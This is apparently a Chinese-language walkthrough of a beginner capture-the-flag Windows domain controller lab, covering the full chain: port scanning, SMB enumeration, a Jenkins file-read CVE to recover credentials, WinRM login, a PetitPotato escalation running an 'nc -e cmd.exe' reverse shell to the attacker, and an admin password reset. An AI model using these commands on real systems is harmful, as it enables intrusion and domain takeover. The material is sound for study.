难度:PRINCIPIANTE
kali:192.168.200.3
靶机:192.168.200.4
端口扫描
root@kali2 [~] ➜ nmap 192.168.200.4 -sV -A -p53,88,135,139,389,445,464,593,636,3268,3269,6969,9389 [23:06:24] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-06 23:08 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.200.4
Host is up (0.00045s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-06 21:08:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: chimichurri.thl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: chimichurri.thl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
6969/tcp open http Jetty 10.0.11
|_http-title: Panel de control [Jenkins]
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(10.0.11)
9389/tcp open mc-nmf .NET Message Framing
MAC Address: 08:00:27:88:AD:FC (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 1 hop
Service Info: Host: CHIMICHURRI; OS: Windows; CPE: cpe:/o:microsoft:windows
看到域名chimichurri.thl
,还有个web服务6969端口的。
SMB枚举
root@kali2 [~] ➜ enum4linux -a 192.168.200.4 [23:14:54] Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Aug 6 23:15:16 2024
=========================================( Target Information )=========================================
Target ........... 192.168.200.4
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.200.4 )===========================
[+] Got domain/workgroup name: CHIMICHURRI0
...
...
没有收获
匿名访问也没有
查看共享目录
root@kali2 [~] ➜ smbclient --no-pass -L //chimichurri.thl [23:18:58]
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Admin remota
C$ Disk Recurso predeterminado
drogas Disk
IPC$ IPC IPC remota
NETLOGON Disk Recurso compartido del servidor de inicio de sesión
SYSVOL Disk Recurso compartido del servidor de inicio de sesión
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to chimichurri.thl failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
有个drogas自定义共享目录
root@kali2 [~] ➜ smbclient //chimichurri.thl/drogas --no-pass [23:22:21] Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jun 27 18:20:49 2024
.. D 0 Thu Jun 27 18:20:49 2024
credenciales.txt A 95 Mon Jul 1 01:19:03 2024
7735807 blocks of size 4096. 4231450 blocks available
不翻译成英文看不懂啊,在他的桌面上有个access key,应该叫parrot。
web渗透
是个jenkins的框架,还给了版本号Jenkins 2.361.4
,搜一下漏洞。试了好几个,发现有个cve可用,并且是任意文件读取漏洞,可以尝试读取上面的桌面文件。
有个python版的exp
https://github.com/godylockz/CVE-2024-23897/blob/main/jenkins_fileread.py
根据提示,实在黑客桌面的parrot文件
拿到黑客账号密码hacker:Perico69
winrm登录
winrm登录发现桌面还有个user flag,但是没有权限读取。
那就在域内信息收集
域内信息收集
全是西班牙语看起来好难受,不过还是让我看到了这个权限SeImpersonatePrivilege
,之前遇到过,允许模拟(但不能创建)任何令牌,可以通过引导 Windows服务(DCOM)针对漏洞执行NTLM身份验证来从Windows服务(DCOM)获取特权令牌,然后启用具有SYSTEM权限的进程的执行。
直接上GodPotato 土豆提取
SeImpersonatePrivilege提权
应该是这个工具版本问题。
测试了几个土豆工具,都不好用,从别人wp那里学来一个新的工具PetitPotato.exe
./PetitPotato.exe 3 "nc -t -e cmd.exe 192.168.200.3 4567"
拿到system权限。
修改一下域控的密码
C:\Users>net user administrador passw0rd!
net user administrador passw0rd!
拿下域控。